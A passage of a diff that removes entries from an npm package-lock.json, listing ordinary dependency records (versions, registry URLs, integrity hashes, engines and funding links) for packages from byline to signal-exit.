"sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "node_modules/byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha512-s6webAy+R4SR8XVuJWt2V2rGvhnrhxN+9S15GNuTK3wKPOXFF6RNc+8ug2XhH+2s4f+uudG4kUVYmYOQWL2g0Q==", - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001680", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001680.tgz", - "integrity": "sha512-rPQy70G6AGUMnbwS1z6Xg+RkHYPAi18ihs47GH0jcxIG7wArmPgY3XbS2sRdBbxJljp3thdT8BIqv9ccCypiPA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/caniuse-lite" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ] - }, - "node_modules/caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" - } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/chownr": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==", - "engines": { - "node": ">=18" - } - }, - "node_modules/ci-info": { - "version": "3.9.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.9.0.tgz", - "integrity": "sha512-NIxF55hv4nSqQswkAeiOi1r83xy8JldOFDTWiug55KBu9Jnblncd2U6ViHmYgHf01TPZS77NJBhBMKdWj9HQMQ==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/sibiraj-s" - } - ], - "engines": { - "node": ">=8" - } - }, - "node_modules/cjs-module-lexer": { - "version": "1.4.1", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.4.1.tgz", - "integrity": "sha512-cuSVIHi9/9E/+821Qjdvngor+xpnlwnuwIyZOaLmHBVdXL+gP+I6QQB9VkO7RI77YIcTV+S1W9AreJ5eN63JBA==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, - "node_modules/combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "dependencies": { - "delayed-stream": "~1.0.0" - }, - "engines": { - "node": ">= 0.8" - } - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" - }, - "node_modules/cosmiconfig": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/cosmiconfig/-/cosmiconfig-7.1.0.tgz", - "integrity": "sha512-AdmX6xUzdNASswsFtmwSt7Vj8po9IuqXm0UXz7QKPuEUmPB4XyjGfaAr2PSuELMwkRMVH1EpIkX5bTZGRB3eCA==", - "dev": true, - "dependencies": { - "@types/parse-json": "^4.0.0", - "import-fresh": "^3.2.1", - "parse-json": "^5.0.0", - "path-type": "^4.0.0", - "yaml": "^1.10.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/create-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/create-jest/-/create-jest-29.7.0.tgz", - "integrity": "sha512-Adz2bdH0Vq3F53KEMJOoftQFutWCukm6J24wbPWRO4k1kMY7gS7ds/uoJkNuV8wDCtWWnuwGcJwpWcih+zEW1Q==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "prompts": "^2.0.1" - }, - "bin": { - "create-jest": "bin/create-jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", - "dependencies": { - "assert-plus": "^1.0.0" - }, - "engines": { - "node": ">=0.10" - } - }, - "node_modules/debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "dependencies": { - "ms": "2.1.2" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/dedent": { - "version": "1.5.3", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-1.5.3.tgz", - "integrity": "sha512-NHQtfOOW68WD8lgypbLA5oT+Bt0xXJhiYvoR6SmmNXZfpzOGXwdKWmcwG8N7PwVVWV3eF/68nmD9BaJSsTBhyQ==", - "dev": true, - "peerDependencies": { - "babel-plugin-macros": "^3.1.0" - }, - "peerDependenciesMeta": { - "babel-plugin-macros": { - "optional": true - } - } - }, - "node_modules/deep-is": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/deep-is/-/deep-is-0.1.4.tgz", - "integrity": "sha512-oIPzksmTg4/MriiaYGO+okXDT7ztn/w3Eptv/+gSIdMdKsJo0u4CfYNFJPy+4SKMuCqGw2wxnA+URMg3t8a/bQ==", - "dev": true, - "peer": true - }, - "node_modules/deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", - "engines": { - "node": ">=0.4.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/diff-sequences": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", - "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/doctrine": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/doctrine/-/doctrine-3.0.0.tgz", - "integrity": "sha512-yS+Q5i3hBf7GBkd4KG8a7eBNNWNGLTaEwwYWUijIYM7zrlYDM0BFXHjjPWlWZ1Rg7UaddZeIDmi9jF3HmqiQ2w==", - "dev": true, - "peer": true, - "dependencies": { - "esutils": "^2.0.2" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/dot-prop": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/dot-prop/-/dot-prop-6.0.1.tgz", - "integrity": "sha512-tE7ztYzXHIeyvc7N+hR3oi7FIbf/NIjVP9hmAt3yMXzrQ072/fpjGLx2GxNxGxUl5V73MEqYzioOMoVhGMJ5cA==", - "dev": true, - "dependencies": { - "is-obj": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/eastasianwidth": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", - "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==" - }, - "node_modules/ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", - "dependencies": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "node_modules/electron-to-chromium": { - "version": "1.5.63", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.63.tgz", - "integrity": "sha512-ddeXKuY9BHo/mw145axlyWjlJ1UBt4WK3AlvkT7W2AbqfRQoacVoRUCF6wL3uIx/8wT9oLKXzI+rFqHHscByaA==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", - "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-4.0.0.tgz", - "integrity": "sha512-TtpcNJ3XAzx3Gq8sWRzJaVajRs0uVxA2YAkdb1jm2YkPz4G6egUFAyA3n5vtEIZefPk5Wa4UXbKuS5fKkJWdgA==", - "dev": true, - "peer": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/eslint": { - "version": "8.44.0", - "resolved": "https://registry.npmjs.org/eslint/-/eslint-8.44.0.tgz", - "integrity": "sha512-0wpHoUbDUHgNCyvFB5aXLiQVfK9B0at6gUvzy83k4kAsQ/u769TQDX6iKC+aO4upIHO9WSaA3QoXYQDHbNwf1A==", - "dev": true, - "peer": true, - "dependencies": { - "@eslint-community/eslint-utils": "^4.2.0", - "@eslint-community/regexpp": "^4.4.0", - "@eslint/eslintrc": "^2.1.0", - "@eslint/js": "8.44.0", - "@humanwhocodes/config-array": "^0.11.10", - "@humanwhocodes/module-importer": "^1.0.1", - "@nodelib/fs.walk": "^1.2.8", - "ajv": "^6.10.0", - "chalk": "^4.0.0", - "cross-spawn": "^7.0.2", - "debug": "^4.3.2", - "doctrine": "^3.0.0", - "escape-string-regexp": "^4.0.0", - "eslint-scope": "^7.2.0", - "eslint-visitor-keys": "^3.4.1", - "espree": "^9.6.0", - "esquery": "^1.4.2", - "esutils": "^2.0.2", - "fast-deep-equal": "^3.1.3", - "file-entry-cache": "^6.0.1", - "find-up": "^5.0.0", - "glob-parent": "^6.0.2", - "globals": "^13.19.0", - "graphemer": "^1.4.0", - "ignore": "^5.2.0", - "import-fresh": "^3.0.0", - "imurmurhash": "^0.1.4", - "is-glob": "^4.0.0", - "is-path-inside": "^3.0.3", - "js-yaml": "^4.1.0", - "json-stable-stringify-without-jsonify": "^1.0.1", - "levn": "^0.4.1", - "lodash.merge": "^4.6.2", - "minimatch": "^3.1.2", - "natural-compare": "^1.4.0", - "optionator": "^0.9.3", - "strip-ansi": "^6.0.1", - "strip-json-comments": "^3.1.0", - "text-table": "^0.2.0" - }, - "bin": { - "eslint": "bin/eslint.js" - }, - "engines": { - "node": "^12.22.0 || ^14.17.0 || >=16.0.0" - }, - "funding": { - "url": "https://opencollective.com/eslint" - } - }, - "node_modules/eslint-scope": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/eslint-scope/-/eslint-scope-7.2.0.tgz", - "integrity": "sha512-DYj5deGlHBfMt15J7rdtyKNq/Nqlv5KfU4iodrQ019XESsRnwXH9KAE0y3cwtUHDo2ob7CypAnCqefh6vioWRw==", - "dev": true, - "peer": true, - "dependencies": { - "esrecurse": "^4.3.0", - "estraverse": "^5.2.0" - }, - "engines": { - "node": "^12.22.0 || ^14.17.0 || >=16.0.0" - }, - "funding": { - "url": "https://opencollective.com/eslint" - } - }, - "node_modules/eslint-visitor-keys": { - "version": "3.4.1", - "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.1.tgz", - "integrity": "sha512-pZnmmLwYzf+kWaM/Qgrvpen51upAktaaiI01nsJD/Yr3lMOdNtq0cxkrrg16w64VtisN6okbs7Q8AfGqj4c9fA==", - "dev": true, - "peer": true, - "engines": { - "node": "^12.22.0 || ^14.17.0 || >=16.0.0" - }, - "funding": { - "url": "https://opencollective.com/eslint" - } - }, - "node_modules/espree": { - "version": "9.6.0", - "resolved": "https://registry.npmjs.org/espree/-/espree-9.6.0.tgz", - "integrity": "sha512-1FH/IiruXZ84tpUlm0aCUEwMl2Ho5ilqVh0VvQXw+byAz/4SAciyHLlfmL5WYqsvD38oymdUwBss0LtK8m4s/A==", - "dev": true, - "peer": true, - "dependencies": { - "acorn": "^8.9.0", - "acorn-jsx": "^5.3.2", - "eslint-visitor-keys": "^3.4.1" - }, - "engines": { - "node": "^12.22.0 || ^14.17.0 || >=16.0.0" - }, - "funding": { - "url": "https://opencollective.com/eslint" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/esquery": { - "version": "1.5.0", - "resolved": "https://registry.npmjs.org/esquery/-/esquery-1.5.0.tgz", - "integrity": "sha512-YQLXUplAwJgCydQ78IMJywZCceoqk1oH01OERdSAJc/7U2AylwjhSCLDEtqwg811idIS/9fIU5GjG73IgjKMVg==", - "dev": true, - "peer": true, - "dependencies": { - "estraverse": "^5.1.0" - }, - "engines": { - "node": ">=0.10" - } - }, - "node_modules/esrecurse": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/esrecurse/-/esrecurse-4.3.0.tgz", - "integrity": "sha512-KmfKL3b6G+RXvP8N1vr3Tq1kL/oCFgn2NYXEtqP8/L3pKapUA4G8cFVaoF3SU323CD4XypR/ffioHmkti6/Tag==", - "dev": true, - "peer": true, - "dependencies": { - "estraverse": "^5.2.0" - }, - "engines": { - "node": ">=4.0" - } - }, - "node_modules/estraverse": { - "version": "5.3.0", - "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-5.3.0.tgz", - "integrity": "sha512-MMdARuVEQziNTeJD8DgMqmhwR11BRQ/cBP+pLtYdSTnf3MIO8fFeiINEbX36ZdNlfU/7A9f3gUw49B3oQsvwBA==", - "dev": true, - "peer": true, - "engines": { - "node": ">=4.0" - } - }, - "node_modules/esutils": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/esutils/-/esutils-2.0.3.tgz", - "integrity": "sha512-kVscqXk4OCp68SZ0dkgEKVi6/8ij300KBWTJq32P/dYeWTSwK41WyTxalN1eRmA5Z9UU/LX9D7FWSmV9SAYx6g==", - "dev": true, - "peer": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-2Zks0hf1VLFYI1kbh0I5jP3KHHyCHpkfyHBzsSXRFgl/Bg9mWYfMW8oD+PdMPlEwy5HNsR9JutYy6pMeOh61nw==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "node_modules/extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", - "engines": [ - "node >=0.6.0" - ] - }, - "node_modules/fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "node_modules/fast-levenshtein": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/fast-levenshtein/-/fast-levenshtein-2.0.6.tgz", - "integrity": "sha512-DCXu6Ifhqcks7TZKY3Hxp3y6qphY5SJZmrWMDrKcERSOXWQdMhU9Ig/PYrzyw/ul9jOIyh0N4M0tbC5hodg8dw==", - "dev": true, - "peer": true - }, - "node_modules/fastq": { - "version": "1.15.0", - "resolved": "https://registry.npmjs.org/fastq/-/fastq-1.15.0.tgz", - "integrity": "sha512-wBrocU2LCXXa+lWBt8RoIRD89Fi8OdABODa/kEnyeyjS5aZO5/GNvI5sEINADqP/h8M29UHTHUb53sUu5Ihqdw==", - "dev": true, - "peer": true, - "dependencies": { - "reusify": "^1.0.4" - } - }, - "node_modules/fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/file-entry-cache": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/file-entry-cache/-/file-entry-cache-6.0.1.tgz", - "integrity": "sha512-7Gps/XWymbLk2QLYK4NzpMOrYjMhdIxXuIvy2QBsLE6ljuodKvdkWs/cpyJJ3CVIVpH0Oi1Hvg1ovbMzLdFBBg==", - "dev": true, - "peer": true, - "dependencies": { - "flat-cache": "^3.0.4" - }, - "engines": { - "node": "^10.12.0 || >=12.0.0" - } - }, - "node_modules/fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/find-up": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-5.0.0.tgz", - "integrity": "sha512-78/PXT1wlLLDgTzDs7sjq9hzz0vXD+zn+7wypEe4fXQxCmdmqfGsEPQxmiCSQI3ajFV91bVSsvNtrJRiW6nGng==", - "dev": true, - "peer": true, - "dependencies": { - "locate-path": "^6.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/flat-cache": { - "version": "3.0.4", - "resolved": "https://registry.npmjs.org/flat-cache/-/flat-cache-3.0.4.tgz", - "integrity": "sha512-dm9s5Pw7Jc0GvMYbshN6zchCA9RgQlzzEZX3vylR9IqFfS8XciblUXOKfW6SiuJ0e13eDYZoZV5wdrev7P3Nwg==", - "dev": true, - "peer": true, - "dependencies": { - "flatted": "^3.1.0", - "rimraf": "^3.0.2" - }, - "engines": { - "node": "^10.12.0 || >=12.0.0" - } - }, - "node_modules/flatted": { - "version": "3.2.7", - "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.2.7.tgz", - "integrity": "sha512-5nqDSxl8nn5BSNxyR3n4I6eDmbolI6WT+QqR547RwxQapgjQBmtktdP+HTBb/a/zLsbzERTONyUB5pefh5TtjQ==", - "dev": true, - "peer": true - }, - "node_modules/foreground-child": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.0.tgz", - "integrity": "sha512-Ld2g8rrAyMYFXBhEqMz8ZAHBi4J4uS1i/CxGMDnjyFWddMXLVcDp051DZfu+t7+ab7Wv6SMqpWmyFIj5UbfFvg==", - "dependencies": { - "cross-spawn": "^7.0.0", - "signal-exit": "^4.0.1" - }, - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/foreground-child/node_modules/signal-exit": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", - "integrity": 